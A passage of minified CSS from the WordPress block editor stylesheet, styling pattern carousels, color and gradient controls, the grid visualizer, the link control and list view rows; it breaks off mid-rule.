.block-editor-block-pattern-setup-list__item-title,.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:hover .block-editor-block-pattern-setup-list__item-title{ color:var(--wp-admin-theme-color); } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item{ break-inside:avoid-column; margin-bottom:24px; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-pattern-setup-list__item-title{ cursor:pointer; font-size:12px; padding-top:8px; text-align:center; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-preview__container{ border:1px solid #ddd; border-radius:4px; min-height:100px; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-preview__content{ width:100%; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar{ align-items:center; align-self:stretch; background-color:#fff; border-top:1px solid #ddd; bottom:0; box-sizing:border-box; color:#1e1e1e; display:flex; flex-direction:row; height:64px; justify-content:space-between; margin:0; padding:16px; position:absolute; text-align:right; width:100%; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__display-controls{ display:flex; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__actions,.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__navigation{ display:flex; width:calc(50% - 36px); } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__actions{ justify-content:flex-end; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container{ box-sizing:border-box; display:flex; flex-direction:column; height:100%; width:100%; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container{ height:100%; list-style:none; margin:0; overflow:hidden; padding:0; position:relative; transform-style:preserve-3d; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container *{ box-sizing:border-box; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{ background-color:#fff; height:100%; margin:auto; padding:0; position:absolute; top:0; width:100%; } @media not (prefers-reduced-motion){ .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{ transition:transform .5s,z-index .5s; } } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{ z-index:100; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.active-slide{ opacity:1; position:relative; z-index:102; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.previous-slide{ transform:translateX(100%); z-index:101; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.next-slide{ transform:translateX(-100%); z-index:101; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .block-list-appender{ display:none; } .block-editor-block-pattern-setup__carousel,.block-editor-block-pattern-setup__grid{ width:100%; } .block-editor-block-variation-transforms:where(fieldset){ border:0; margin:0; padding:0; } .block-editor-block-variation-transforms{ box-sizing:border-box; padding:0 52px 16px 16px; width:100%; } .block-editor-block-variation-transforms .components-dropdown-menu__toggle{ border:1px solid #757575; border-radius:2px; justify-content:right; min-height:30px; padding:6px 12px; position:relative; text-align:right; width:100%; } .block-editor-block-variation-transforms .components-dropdown-menu__toggle.components-dropdown-menu__toggle{ padding-left:24px; } .block-editor-block-variation-transforms .components-dropdown-menu__toggle:focus:not(:disabled){ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 calc(var(--wp-admin-border-width-focus) - 1px) var(--wp-admin-theme-color); } .block-editor-block-variation-transforms .components-dropdown-menu__toggle svg{ height:100%; left:0; padding:0; position:absolute; top:0; } .block-editor-block-variation-transforms__popover .components-popover__content{ min-width:230px; } .components-border-radius-control__header{ height:16px; margin-bottom:12px; } .components-border-radius-control{ border:0; margin:0 0 12px; padding:0; } .components-border-radius-control legend{ margin-bottom:0; } .components-border-radius-control .components-border-radius-control__input-controls-wrapper{ display:grid; gap:16px; grid-template-columns:repeat(2, minmax(0, 1fr)); margin-left:12px; } .components-border-radius-control .components-border-radius-control__linked-button{ display:flex; justify-content:center; } .components-border-radius-control .components-border-radius-control__linked-button svg{ margin-left:0; } .components-border-radius-control__custom-select-control,.components-border-radius-control__range-control{ flex:1; } .components-border-radius-control__icon{ flex:0 0 auto; } .block-editor-color-gradient-control .block-editor-color-gradient-control__color-indicator{ margin-bottom:12px; } .block-editor-color-gradient-control__fieldset{ border:0; margin:0; min-width:0; padding:0; } .block-editor-panel-color-gradient-settings.block-editor-panel-color-gradient-settings,.block-editor-panel-color-gradient-settings.block-editor-panel-color-gradient-settings>div:not(:first-of-type){ display:block; } @media screen and (min-width:782px){ .block-editor-panel-color-gradient-settings .components-circular-option-picker__swatches{ display:grid; grid-template-columns:repeat(6, 28px); } } .block-editor-block-inspector .block-editor-panel-color-gradient-settings .components-base-control{ margin-bottom:inherit; } .block-editor-panel-color-gradient-settings__dropdown-content{ min-height:160px; } .block-editor-panel-color-gradient-settings__dropdown-content .block-editor-color-gradient-control__panel{ padding:16px; width:260px; } .block-editor-panel-color-gradient-settings__color-indicator{ background:linear-gradient(45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); } .block-editor-tools-panel-color-gradient-settings__item{ border-bottom:1px solid #ddd; border-left:1px solid #ddd; border-right:1px solid #ddd; max-width:100%; padding:0; position:relative; } .block-editor-tools-panel-color-gradient-settings__item:nth-child(1 of .block-editor-tools-panel-color-gradient-settings__item){ border-top:1px solid #ddd; border-top-left-radius:2px; border-top-right-radius:2px; margin-top:24px; } .block-editor-tools-panel-color-gradient-settings__item:nth-last-child(1 of .block-editor-tools-panel-color-gradient-settings__item){ border-bottom-left-radius:2px; border-bottom-right-radius:2px; } .block-editor-tools-panel-color-gradient-settings__item>div,.block-editor-tools-panel-color-gradient-settings__item>div>button{ border-radius:inherit; } .block-editor-tools-panel-color-gradient-settings__dropdown{ display:block; padding:0; } .block-editor-tools-panel-color-gradient-settings__dropdown>button{ height:auto; padding-bottom:10px; padding-top:10px; text-align:right; } .block-editor-tools-panel-color-gradient-settings__dropdown>button.is-open{ background:#f0f0f0; color:var(--wp-admin-theme-color); } .block-editor-tools-panel-color-gradient-settings__dropdown .block-editor-panel-color-gradient-settings__color-name{ max-width:calc(100% - 44px); overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .block-editor-panel-color-gradient-settings__dropdown{ width:100%; } .block-editor-panel-color-gradient-settings__dropdown .component-color-indicator{ flex-shrink:0; } .block-editor-panel-color-gradient-settings__reset{ left:0; margin:auto 8px; opacity:0; position:absolute; top:8px; } @media not (prefers-reduced-motion){ .block-editor-panel-color-gradient-settings__reset{ transition:opacity .1s ease-in-out; } } .block-editor-panel-color-gradient-settings__reset.block-editor-panel-color-gradient-settings__reset{ border-radius:2px; } .block-editor-panel-color-gradient-settings__dropdown:hover+.block-editor-panel-color-gradient-settings__reset,.block-editor-panel-color-gradient-settings__reset:focus,.block-editor-panel-color-gradient-settings__reset:hover{ opacity:1; } @media (hover:none){ .block-editor-panel-color-gradient-settings__reset{ opacity:1; } } .block-editor-date-format-picker{ border:none; margin:0 0 16px; padding:0; } .block-editor-date-format-picker__custom-format-select-control__custom-option{ border-top:1px solid #ddd; } .block-editor-duotone-control__popover.components-popover>.components-popover__content{ padding:8px; width:260px; } .block-editor-duotone-control__popover.components-popover .components-menu-group__label{ padding:0; } .block-editor-duotone-control__popover.components-popover .components-circular-option-picker__swatches{ display:grid; gap:12px; grid-template-columns:repeat(6, 28px); justify-content:space-between; } .block-editor-duotone-control__unset-indicator{ background:linear-gradient(45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); } .components-font-appearance-control [role=option]{ color:#1e1e1e; text-transform:capitalize; } .block-editor-font-family-control:not(.is-next-has-no-margin-bottom){ margin-bottom:8px; } .block-editor-global-styles__toggle-icon{ fill:currentColor; } .block-editor-global-styles__shadow-popover-container{ width:230px; } .block-editor-global-styles__shadow__list{ display:flex; flex-wrap:wrap; gap:12px; padding-bottom:8px; } .block-editor-global-styles__clear-shadow{ text-align:left; } .block-editor-global-styles-filters-panel__dropdown,.block-editor-global-styles__shadow-dropdown{ border:1px solid #ddd; border-radius:2px; display:block; padding:0; position:relative; } .block-editor-global-styles-filters-panel__dropdown-toggle,.block-editor-global-styles__shadow-dropdown-toggle{ padding:8px; width:100%; } .block-editor-global-styles-filters-panel__dropdown-toggle.is-open,.block-editor-global-styles__shadow-dropdown-toggle.is-open{ background-color:#f0f0f0; } .block-editor-global-styles__shadow-editor__remove-button{ left:0; margin:auto 8px; opacity:0; position:absolute; top:8px; } @media not (prefers-reduced-motion){ .block-editor-global-styles__shadow-editor__remove-button{ transition:opacity .1s ease-in-out; } } .block-editor-global-styles__shadow-dropdown:hover .block-editor-global-styles__shadow-editor__remove-button,.block-editor-global-styles__shadow-editor__remove-button:focus,.block-editor-global-styles__shadow-editor__remove-button:hover{ opacity:1; } @media (hover:none){ .block-editor-global-styles__shadow-editor__remove-button{ opacity:1; } } .block-editor-global-styles__shadow-indicator{ align-items:center; appearance:none; background:none; border:1px solid #e0e0e0; border-radius:2px; box-sizing:border-box; color:#2f2f2f; cursor:pointer; display:inline-flex; height:26px; padding:0; transform:scale(1); width:26px; } @media not (prefers-reduced-motion){ .block-editor-global-styles__shadow-indicator{ transition:transform .1s ease; } } .block-editor-global-styles__shadow-indicator{ will-change:transform; } .block-editor-global-styles__shadow-indicator:focus{ border:2px solid #757575; } .block-editor-global-styles__shadow-indicator:hover{ transform:scale(1.2); } .block-editor-global-styles__shadow-indicator.unset{ background:linear-gradient(45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); } .block-editor-global-styles-advanced-panel__custom-css-input textarea{ direction:ltr; font-family:Menlo,Consolas,monaco,monospace; } .block-editor-panel-duotone-settings__reset{ left:0; margin:auto 8px; opacity:0; position:absolute; top:8px; } @media not (prefers-reduced-motion){ .block-editor-panel-duotone-settings__reset{ transition:opacity .1s ease-in-out; } } .block-editor-global-styles-filters-panel__dropdown:hover .block-editor-panel-duotone-settings__reset,.block-editor-panel-duotone-settings__reset:focus,.block-editor-panel-duotone-settings__reset:hover{ opacity:1; } @media (hover:none){ .block-editor-panel-duotone-settings__reset{ opacity:1; } } .block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer{ z-index:30; } .block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer .components-popover__content *{ pointer-events:none; } .block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer.is-dropping-allowed .block-editor-grid-visualizer__drop-zone{ pointer-events:all; } .block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer .block-editor-inserter *{ pointer-events:auto; } .block-editor-grid-visualizer__grid{ display:grid; position:absolute; } .block-editor-grid-visualizer__cell{ display:grid; position:relative; } .block-editor-grid-visualizer__cell .block-editor-inserter{ bottom:0; color:inherit; left:0; overflow:hidden; position:absolute; right:0; top:0; z-index:32; } .block-editor-grid-visualizer__cell .block-editor-inserter .block-editor-grid-visualizer__appender{ box-shadow:inset 0 0 0 1px color-mix(in srgb, currentColor 20%, #0000); color:inherit; height:100%; opacity:0; overflow:hidden; padding:0 !important; width:100%; } .block-editor-grid-visualizer__cell.is-highlighted .block-editor-grid-visualizer__drop-zone,.block-editor-grid-visualizer__cell.is-highlighted .block-editor-inserter{ background:var(--wp-admin-theme-color); } .block-editor-grid-visualizer__cell .block-editor-grid-visualizer__appender:focus,.block-editor-grid-visualizer__cell:hover .block-editor-grid-visualizer__appender{ background-color:color-mix(in srgb, currentColor 20%, #0000); opacity:1; } .block-editor-grid-visualizer__drop-zone{ background:#cccccc1a; grid-column:1; grid-row:1; height:100%; min-height:8px; min-width:8px; width:100%; } .block-editor-grid-item-resizer.block-editor-grid-item-resizer.block-editor-grid-item-resizer{ z-index:30; } .block-editor-grid-item-resizer.block-editor-grid-item-resizer.block-editor-grid-item-resizer .components-popover__content *{ pointer-events:none; } .block-editor-grid-item-resizer__box{ border:1px solid var(--wp-admin-theme-color); } .block-editor-grid-item-resizer__box .components-resizable-box__handle.components-resizable-box__handle.components-resizable-box__handle{ pointer-events:all; } .block-editor-grid-item-mover__move-button-container{ border:none; display:flex; justify-content:center; padding:0; } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button{ min-width:0 !important; padding-left:0; padding-right:0; width:24px; } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button svg{ min-width:24px; } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:before{ border-radius:2px; content:""; display:block; height:32px; left:8px; position:absolute; right:8px; z-index:-1; } @media not (prefers-reduced-motion){ .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:before{ animation:components-button__appear-animation .1s ease; animation-fill-mode:forwards; } } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus,.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus:before,.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus:enabled{ box-shadow:none; outline:none; } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus-visible:before{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-grid-item-mover__move-vertical-button-container{ display:flex; position:relative; } @media (min-width:600px){ .block-editor-grid-item-mover__move-vertical-button-container{ flex-direction:column; justify-content:space-around; } .block-editor-grid-item-mover__move-vertical-button-container>.block-editor-grid-item-mover-button.block-editor-grid-item-mover-button{ height:20px !important; min-width:0 !important; width:100%; } .block-editor-grid-item-mover__move-vertical-button-container>.block-editor-grid-item-mover-button.block-editor-grid-item-mover-button:before{ height:calc(100% - 4px); } .block-editor-grid-item-mover__move-vertical-button-container .block-editor-grid-item-mover-button.is-down-button svg,.block-editor-grid-item-mover__move-vertical-button-container .block-editor-grid-item-mover-button.is-up-button svg{ flex-shrink:0; height:20px; } .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-vertical-button-container{ height:40px; position:relative; top:-4px; } } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container{ position:relative; } @media (min-width:600px){ .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container:before{ background:#e0e0e0; content:""; height:100%; position:absolute; top:0; width:1px; } } @media (min-width:782px){ .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container:before{ background:#1e1e1e; } } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-left{ padding-left:6px; } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-left:before{ left:0; } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-right{ padding-right:6px; } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-right:before{ right:0; } @media (min-width:600px){ .show-icon-labels .block-editor-grid-item-mover__move-vertical-button-container:before{ background:#e0e0e0; content:""; height:1px; margin-top:-.5px; position:absolute; right:50%; top:50%; transform:translate(50%); width:100%; } } @media (min-width:782px){ .show-icon-labels .block-editor-grid-item-mover__move-vertical-button-container:before{ background:#1e1e1e; } } .show-icon-labels .block-editor-grid-item-mover-button{ white-space:nowrap; } .show-icon-labels .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-horizontal-button-container:before{ background:#ddd; height:24px; top:4px; } .show-icon-labels .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-vertical-button-container:before{ background:#ddd; width:calc(100% - 24px); } .block-editor-height-control{ border:0; margin:0; padding:0; } .block-editor-iframe__container{ height:100%; width:100%; } .block-editor-iframe__scale-container{ height:100%; } .block-editor-iframe__scale-container.is-zoomed-out{ left:0; position:absolute; width:var(--wp-block-editor-iframe-zoom-out-scale-container-width, 100vw); } .block-editor-block-types-list__list-item{ display:block; margin:0; padding:0; width:33.33%; } .block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled) .block-editor-block-icon.has-colors{ color:var(--wp-block-synced-color); } .block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):hover .block-editor-block-types-list__item-title{ color:var(--wp-block-synced-color) !important; filter:brightness(.95); } .block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):hover svg{ color:var(--wp-block-synced-color) !important; } .block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):after{ background:var(--wp-block-synced-color); } .components-button.block-editor-block-types-list__item{ align-items:stretch; background:#0000; color:#1e1e1e; cursor:pointer; display:flex; flex-direction:column; font-size:13px; justify-content:center; padding:8px; width:100%; word-break:break-word; } @media not (prefers-reduced-motion){ .components-button.block-editor-block-types-list__item{ transition:all .05s ease-in-out; } } .components-button.block-editor-block-types-list__item{ height:auto; position:relative; } .components-button.block-editor-block-types-list__item:disabled,.components-button.block-editor-block-types-list__item[aria-disabled=true]{ cursor:default; opacity:.6; } .components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover .block-editor-block-types-list__item-title{ color:var(--wp-admin-theme-color) !important; filter:brightness(.95); } .components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover svg{ color:var(--wp-admin-theme-color) !important; } .components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover:after{ background:var(--wp-admin-theme-color); border-radius:2px; bottom:0; content:""; left:0; opacity:.04; pointer-events:none; position:absolute; right:0; top:0; } .components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]).is-active{ background:#1e1e1e; color:#fff; outline:2px solid #0000; outline-offset:-2px; } .components-button.block-editor-block-types-list__item:not(:disabled):focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-editor-block-types-list__item-icon{ color:#1e1e1e; padding:12px 20px; } @media not (prefers-reduced-motion){ .block-editor-block-types-list__item-icon{ transition:all .05s ease-in-out; } } .block-editor-block-types-list__item-icon .block-editor-block-icon{ margin-left:auto; margin-right:auto; } @media not (prefers-reduced-motion){ .block-editor-block-types-list__item-icon svg{ transition:all .15s ease-out; } } .block-editor-block-types-list__list-item[draggable=true] .block-editor-block-types-list__item-icon{ cursor:grab; } .block-editor-block-types-list__item-title{ font-size:12px; hyphens:auto; padding:4px 2px 8px; } .block-editor-block-inspector__tabs [role=tablist]{ width:100%; } .block-editor-inspector-popover-header{ margin-bottom:16px; } .items-justified-left{ justify-content:flex-start; } .items-justified-center{ justify-content:center; } .items-justified-right{ justify-content:flex-end; } .items-justified-space-between{ justify-content:space-between; } @keyframes loadingpulse{ 0%{ opacity:1; } 50%{ opacity:0; } to{ opacity:1; } } .block-editor-link-control{ min-width:350px; position:relative; } .components-popover__content .block-editor-link-control{ max-width:350px; min-width:auto; width:90vw; } .show-icon-labels .block-editor-link-control .components-button.has-icon svg{ display:none; } .show-icon-labels .block-editor-link-control .components-button.has-icon:before{ content:attr(aria-label); } .show-icon-labels .block-editor-link-control .block-editor-link-control__search-item-top{ flex-wrap:wrap; gap:4px; } .show-icon-labels .block-editor-link-control .block-editor-link-control__search-item-top .components-button.has-icon{ padding:4px; width:auto; } .show-icon-labels .block-editor-link-control .is-preview .block-editor-link-control__search-item-header{ margin-left:0; min-width:100%; } .block-editor-link-control__search-input-wrapper{ margin-bottom:8px; position:relative; } .block-editor-link-control__help{ color:#757575; font-size:12px; font-style:normal; margin-bottom:0; margin-top:-8px; padding:0 16px; } .block-editor-link-control__search-input-container,.block-editor-link-control__search-input-wrapper{ position:relative; } .block-editor-link-control__field{ margin:16px; } .block-editor-link-control__field .components-base-control__label{ color:#1e1e1e; } .block-editor-link-control__search-error{ margin:-8px 16px 16px; } .block-editor-link-control__search-actions{ padding:8px 16px 16px; } .block-editor-link-control__search-results-wrapper{ position:relative; } .block-editor-link-control__search-results-wrapper:after,.block-editor-link-control__search-results-wrapper:before{ content:""; display:block; left:16px; pointer-events:none; position:absolute; right:-1px; z-index:100; } .block-editor-link-control__search-results-wrapper:before{ bottom:auto; height:8px; top:0; } .block-editor-link-control__search-results-wrapper:after{ bottom:0; height:16px; top:auto; } .block-editor-link-control__search-results{ margin-top:-16px; max-height:200px; overflow-y:auto; padding:8px; } .block-editor-link-control__search-results.is-loading{ opacity:.2; } .block-editor-link-control__search-item.components-button.components-menu-item__button{ height:auto; text-align:right; } .block-editor-link-control__search-item .components-menu-item__item{ display:inline-block; overflow:hidden; text-overflow:ellipsis; width:100%; } .block-editor-link-control__search-item .components-menu-item__item mark{ background-color:initial; color:inherit; font-weight:600; } .block-editor-link-control__search-item .components-menu-item__shortcut{ color:#757575; white-space:nowrap; } .block-editor-link-control__search-item[aria-selected]{ background:#f0f0f0; } .block-editor-link-control__search-item.is-current{ background:#0000; border:0; cursor:default; flex-direction:column; padding:16px; width:100%; } .block-editor-link-control__search-item .block-editor-link-control__search-item-header{ align-items:center; display:block; flex-direction:row; gap:8px; margin-left:8px; overflow-wrap:break-word; white-space:pre-wrap; } .block-editor-link-control__search-item .block-editor-link-control__search-item-header .block-editor-link-control__search-item-info{ color:#757575; font-size:12px; line-height:1.1; word-break:break-all; } .block-editor-link-control__search-item.is-preview .block-editor-link-control__search-item-header{ display:flex; flex:1; } .block-editor-link-control__search-item.is-error .block-editor-link-control__search-item-header{ align-items:center; } .block-editor-link-control__search-item.is-url-title .block-editor-link-control__search-item-title{ word-break:break-all; } .block-editor-link-control__search-item .block-editor-link-control__search-item-details{ display:flex; flex-direction:column; gap:4px; justify-content:space-between; } .block-editor-link-control__search-item .block-editor-link-control__search-item-header .block-editor-link-control__search-item-icon{ background-color:#f0f0f0; border-radius:2px; height:32px; width:32px; } .block-editor-link-control__search-item .block-editor-link-control__search-item-icon{ align-items:center; display:flex; flex-shrink:0; justify-content:center; position:relative; } .block-editor-link-control__search-item .block-editor-link-control__search-item-icon img{ width:16px; } .block-editor-link-control__search-item.is-error .block-editor-link-control__search-item-icon{ max-height:32px; top:0; width:32px; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title{ line-height:1.1; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title:focus{ box-shadow:none; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title:focus-visible{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; text-decoration:none; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title mark{ background-color:initial; color:inherit; font-weight:600; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title span{ font-weight:400; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title .components-external-link__icon{ height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; clip:rect(0, 0, 0, 0); border:0; } .block-editor-link-control__search-item-top{ align-items:center; display:flex; flex-direction:row; width:100%; } .block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon img,.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon svg{ opacity:0; } .block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon:before{ background-color:#f0f0f0; border-radius:100%; bottom:0; content:""; display:block; left:0; position:absolute; right:0; top:0; } @media not (prefers-reduced-motion){ .block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon:before{ animation:loadingpulse 1s linear infinite; animation-delay:.5s; } } .block-editor-link-control__loading{ align-items:center; display:flex; margin:16px; } .block-editor-link-control__loading .components-spinner{ margin-top:0; } .components-button+.block-editor-link-control__search-create{ overflow:visible; padding:12px 16px; } .components-button+.block-editor-link-control__search-create:before{ content:""; display:block; position:absolute; right:0; top:-10px; width:100%; } .block-editor-link-control__search-create{ align-items:center; } .block-editor-link-control__search-create .block-editor-link-control__search-item-title{ margin-bottom:0; } .block-editor-link-control__search-create .block-editor-link-control__search-item-icon{ top:0; } .block-editor-link-control__drawer-inner{ display:flex; flex-basis:100%; flex-direction:column; position:relative; } .block-editor-link-control__settings{ border:0; margin:0; padding:0; } .block-editor-link-control__setting{ flex:1; margin-bottom:0; padding:8px 24px; } .block-editor-link-control__setting .components-base-control:not(.components-input-control) .components-base-control__field{ display:flex; } .block-editor-link-control__setting .components-base-control__field .components-checkbox-control__label{ color:#1e1e1e; } .block-editor-link-control__setting input{ margin-right:0; } .is-preview .block-editor-link-control__setting{ padding:20px 0 8px 8px; } .block-editor-link-control__tools{ margin-top:-16px; padding:8px 8px 0; } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle{ gap:0; padding-right:0; } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true]{ color:#1e1e1e; } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{ visibility:visible; } @media not (prefers-reduced-motion){ .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{ transition:transform .1s ease; } } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{ transform:rotate(-90deg); } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=false] svg{ transform:rotate(0deg); visibility:visible; } @media not (prefers-reduced-motion){ .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=false] svg{ transition:transform .1s ease; } } .block-editor-link-control .block-editor-link-control__search-input .components-spinner{ display:block; } .block-editor-link-control .block-editor-link-control__search-input .components-spinner.components-spinner{ bottom:auto; left:40px; position:absolute; right:auto; top:calc(50% - 8px); } .block-editor-link-control .block-editor-link-control__search-input-wrapper.has-actions .components-spinner{ left:12px; top:calc(50% + 4px); } .block-editor-list-view-tree{ border-collapse:collapse; margin:0; padding:0; width:100%; } .components-modal__content .block-editor-list-view-tree{ margin:-12px -6px 0; width:calc(100% + 12px); } .block-editor-list-view-tree.is-dragging tbody{ pointer-events:none; } .block-editor-list-view-leaf{ position:relative; transform:translateY(0); } .block-editor-list-view-leaf.is-draggable,.block-editor-list-view-leaf.is-draggable .block-editor-list-view-block-contents{ cursor:grab; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button[aria-expanded=true]{ color:inherit; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button:hover{ color:var(--wp-admin-theme-color); } .block-editor-list-view-leaf .block-editor-list-view-block-select-button svg{ fill:currentColor; } @media (forced-colors:active){ .block-editor-list-view-leaf .block-editor-list-view-block-select-button svg{ fill:CanvasText; } } .is-dragging-components-draggable .block-editor-list-view-leaf:not(.is-selected) .block-editor-list-view-block-select-button:hover{ color:inherit; } .block-editor-list-view-leaf.is-selected td{ background:var(--wp-admin-theme-color); } .block-editor-list-view-leaf.is-selected.is-synced td{ background:var(--wp-block-synced-color); } .block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents .block-editor-block-icon,.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:focus,.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:hover{ color:var(--wp-block-synced-color); } .block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color); } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block-contents,.block-editor-list-view-leaf.is-selected .components-button.has-icon{ color:#fff; } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block-contents:focus:after{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-editor-list-view-leaf.is-selected.is-synced .block-editor-list-view-block-contents:focus:after{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color); } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block__menu:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) #fff; } .block-editor-list-view-leaf.is-first-selected td:first-child{ border-top-right-radius:2px; } .block-editor-list-view-leaf.is-first-selected td:last-child{ border-top-left-radius:2px; } .block-editor-list-view-leaf.is-last-selected td:first-child{ border-bottom-right-radius:2px; } .block-editor-list-view-leaf.is-last-selected td:last-child{ border-bottom-left-radius:2px; } .block-editor-list-view-leaf.is-branch-selected:not(.is-selected):not(.is-synced-branch){ background:rgba(var(--wp-admin-theme-color--rgb), .04); } .block-editor-list-view-leaf.is-synced-branch.is-branch-selected{ background:rgba(var(--wp-block-synced-color--rgb), .04); } .block-editor-list-view-leaf.is-branch-selected.is-first-selected td:first-child{ border-top-right-radius:2px; } .block-editor-list-view-leaf.is-branch-selected.is-first-selected td:last-child{ border-top-left-radius:2px; } .block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-first-selected td:first-child{ border-top-right-radius:2px; } .block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-first-selected td:last-child{ border-top-left-radius:2px; } .block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-last-selected td:first-child{ border-bottom-right-radius:2px; } .block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-last-selected td:last-child{ border-bottom-left-radius:2px; } .block-editor-list-view-leaf.is-branch-selected:not(.is-selected) td{ border-radius:0; } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-displacement-normal{ transition:transform .2s; } } .block-editor-list-view-leaf.is-displacement-normal{ transform:translateY(0); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-displacement-up{ transition:transform 